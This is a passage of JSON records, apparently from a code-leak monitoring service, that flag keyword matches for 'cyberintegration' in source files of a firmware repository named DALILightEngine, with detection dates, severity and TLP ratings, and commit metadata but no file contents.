+ "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Timers/Timers.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "dd040d65a8c08c08ce121270d4ac741645b14fb7", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Timers/Timers.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Timers/Timers.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "33132cf183c6c2d7d593577040d5f8e5777be49b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Timers/Timers_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Timers/Timers_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "213b51da637d25746bb472491811fef0ef8d935c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Clock/Clock_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Clock/Clock_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "7c443cdceb9086e3f1cf716d02794a45a67f1b02", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/DAC/Dac_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/DAC/Dac_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "dd6ca30c612ca05a6e7d9b13232556c00de7c26e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/DAC/Dac_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/DAC/Dac_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6abedf3686154dc38645a8684b583ca60507cd58", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Event/Event_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Event/Event_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9faaa09c66f30e5f8152cc8142e46f4f363674fe", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Event/Event_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Event/Event_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1660a3a0d54f87d81ac1954a973094f2bc7650d8", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/GPIO/Gpio_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/GPIO/Gpio_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6a34daf04ea14f458669b574adebca4aec372190", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/GPIO/Gpio_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/GPIO/Gpio_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a5a4e9c25a1557bbccd2d764c0ab249138e1e783", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/I2C/I2c_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/I2C/I2c_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "27a206a9b095390b360bea70cd918c197ee897f2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/I2C/I2c_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/I2C/I2c_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "abe4473c1bf22c9e227ae6bb8dfaa1d23d368993", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/PowerManager/PowerManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/PowerManager/PowerManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "163dfcc812dc8678176e10647c9d94a29067a657", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/PowerManager/PowerManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/PowerManager/PowerManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "62135fbe72a49fc117ff45c51da465f7904087b5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/SystemTick/SystemTick_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/SystemTick/SystemTick_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "393a02cf86ae870951f61869f5d4efd18b1febdc", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/SystemTick/SystemTick_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/SystemTick/SystemTick_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "fdd0f29caed7ab1114e360ff049883b7e620fc74", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/SystemTick/SystemTick_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/SystemTick/SystemTick_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4261a01e8d39c506c238f830ae7180dea58d6202", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Timers/Timers_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Timers/Timers_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "7abe5053691aa1f16eedd96f8cf9ae708b04b1e5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Timers/Timers_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Timers/Timers_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4f3ff694d8d5c95d1ac697933132d5e708540721", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/QueueManager/QueueManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/QueueManager/QueueManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ed39279d060073536367f1b65876ace34b4ea55b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/QueueManager/QueueManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/QueueManager/QueueManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "263a023e5d8ccf8f7a51ebccdab85789e54b36b5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/QueueManager/QueueManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/QueueManager/QueueManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a90d7771125101ec8b7945af1cb3bc6893422415", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/SystemControlManager/SystemControlManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/SystemControlManager/SystemControlManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6125166b747f04d722a1dff9f33b3f8c0ed5e464", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/SystemControlManager/SystemControlManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/SystemControlManager/SystemControlManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f6d88cf41619077e82aa8f4ee1b14f8f574d3c14", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/SystemControlManager/SystemControlManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/SystemControlManager/SystemControlManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ed65c6fc60f553d1e615aaae88c703bdd2c88018", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/TaskManager/TaskManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/TaskManager/TaskManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f2fddb61d4c3819547e5b75f47d0d25fa6dc7ed9", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/TaskManager/TaskManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/TaskManager/TaskManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "752909a54ba4a307cfc378fd5d684f8844350a4b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/TaskManager/TaskManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/TaskManager/TaskManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "03d3943d397c38da04e243bb254ad1816c48b82f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/QueueManager/QueueManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/QueueManager/QueueManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "321f4ee9985a4cbe47b6f5d726b2038619892635", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/QueueManager/QueueManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/QueueManager/QueueManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6a03fda2495554a0d469dba2597b804a3cc9eb3a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/SystemControlManager/SystemControlManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/SystemControlManager/SystemControlManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "eabe4eeaf27e013ab8f8bf55d00d3ce2b22a6050", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/SystemControlManager/SystemControlManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + 